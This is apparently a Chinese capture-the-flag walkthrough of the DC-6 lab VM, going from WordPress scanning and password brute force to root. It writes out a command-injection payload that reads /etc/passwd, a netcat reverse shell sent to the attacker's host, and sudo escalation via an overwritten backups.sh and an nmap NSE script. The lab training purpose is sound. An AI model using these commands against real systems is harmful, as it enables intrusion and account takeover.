打靶系列之DC-6

  • A+
所属分类:安全文章

01 项目安装

先把DC-6的靶机安装到本地

下载地址是:https://www.five86.com/dc-6.html

打靶系列之DC-6

进入页面点击here 进行下载

下载好之后,导入咱们的虚拟机

打靶系列之DC-6

看到这个页面,表示我们靶机安装成功


02 信息收集

首先我们进行信息收集,获取靶机的ip和相关端口

#获取ip地址
netdiscover -r  192.168.1.0/24

打靶系列之DC-6

知道了Ip,看下靶机开放了哪些端口

#获取端口
nmap -A  192.168.1.148

打靶系列之DC-6

可以看到靶机开放了80端口和22端口,访问一下页面

打靶系列之DC-6

可惜的是访问不了,因为做了域名绑定,所以需要我们在本地做个域名映射,这个和之前DC-2是一样的问题

打开C:WindowsSystem32driversetc下的hosts文件

在末尾加入

192.168.1.148   wordy (记住写上自己靶机的IP)

打靶系列之DC-6

ok,访问成功

当然咱们kali也需要进行进行配置

vi  /etc/hosts
# 将 192.168.1.148   wordy 加入末尾

打靶系列之DC-6

保存退出


03 指纹识别

在页面查看一番,很明显这个是WordPress开发的,后台也是特定的是wp-admin,访问一下

打靶系列之DC-6

后台也获取到

既然已经知道是WordPress,那我们可以使用一个神器工具 wpscan ,这个工具是专门用来扫描WordPress 漏洞的黑盒子扫描器

在kali中执行

# 获取可能存在的用户名
wpscan  --url  http://wordy/ -e u

打靶系列之DC-6

用户名为:admin,mark,graham,sarah,jens

既然获取到了用户名,现在只需要获得密码,就可以直接爆破

寻找了一番,发现DC-6的作者已经把密码告诉我了我们:https://www.vulnhub.com/entry/dc-6,315/

OK, this isn't really a clue as such, but more of some "we don't want to spend five years waiting for a certain process to finish" kind of advice for those who just want to get on with the job.

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt That should save you a few years. ;-)

在kali中执行

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

打靶系列之DC-6

可以看到密码已经获取到

创建个username.txt文件,把之前的用户名放入里面,准备开始爆破

打靶系列之DC-6

执行

wpscan –url http://wordy –U username.txt –P passwords.txt

打靶系列之DC-6

获取到账户名为: mark,密码是: helpdesk01

打靶系列之DC-6

登录成功

04 漏洞利用

登录后台之后可以看到 activity monitor插件,百度了一下,发现这个插件是可以被利用

打靶系列之DC-6

点击Lookup, 使用pb抓包

127.0.0.1|cat /etc/passwd

直接获取了服务器账户信息

打靶系列之DC-6

可以反弹shell


kill输入

nc -lvvp 1234


在bp中输入

nc -e /bin/sh 192.168.1.116 1234


打靶系列之DC-6


打靶系列之DC-6

获取shell成功

执行

#获取正向的shell
python -c  'import pty;pty.spawn ( "/bin/bash")'


05 提权

在服务器一通查询,发现在 /home/mark/stuff 目录下有个things-to-do.txt文件

查看一下发现居然有服务器账号和密码

打靶系列之DC-6


graham - GSo7isUM1D4- done

尝试ssh登录

ssh [email protected]

打靶系列之DC-6

登录成功

在/home/jens文件下看到backups.sh脚本

执行

sudo -l

打靶系列之DC-6

发现无密码执行权限,利用这个sh脚本可以直接获取到jens的shell

执行一下命令

#将脚本中的内容清空
cat /dev/null > backups.sh

#将/bin/bash写入backups.sh文件中
echo "/bin/bash" >> backups.sh

打靶系列之DC-6


执行

#使用jens用户执行sh脚本文件即可获取shell
sudo -u jens ./backups.sh

打靶系列之DC-6

成功拿到jens用户的shell

执行

#查看jens权限
sudo -l

打靶系列之DC-6

可以看到这里可以利用nmap进行提权

进入/home/jens目录,执行下面两条命令

#将os.execute('/bin/bash')写入到root.nse文件中
echo "os.execute('/bin/bash')" >> root.nse

#利用nmap插件执行 /bin/bash 来获取root权限
sudo nmap --script=root.nse

打靶系列之DC-6

可以看到提权成功!

打靶系列之DC-6

获取到目标!


06 总结

  1. 熟悉activity monitor插件进行漏洞利用

  2. 从服务器中寻找蛛丝马迹,获取其他账户的账户名和密码

  3. 使用服务器脚本获取shell

  4. 利用nmap进行提权操作



本文始发于微信公众号(零度安全攻防实验室):打靶系列之DC-6

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: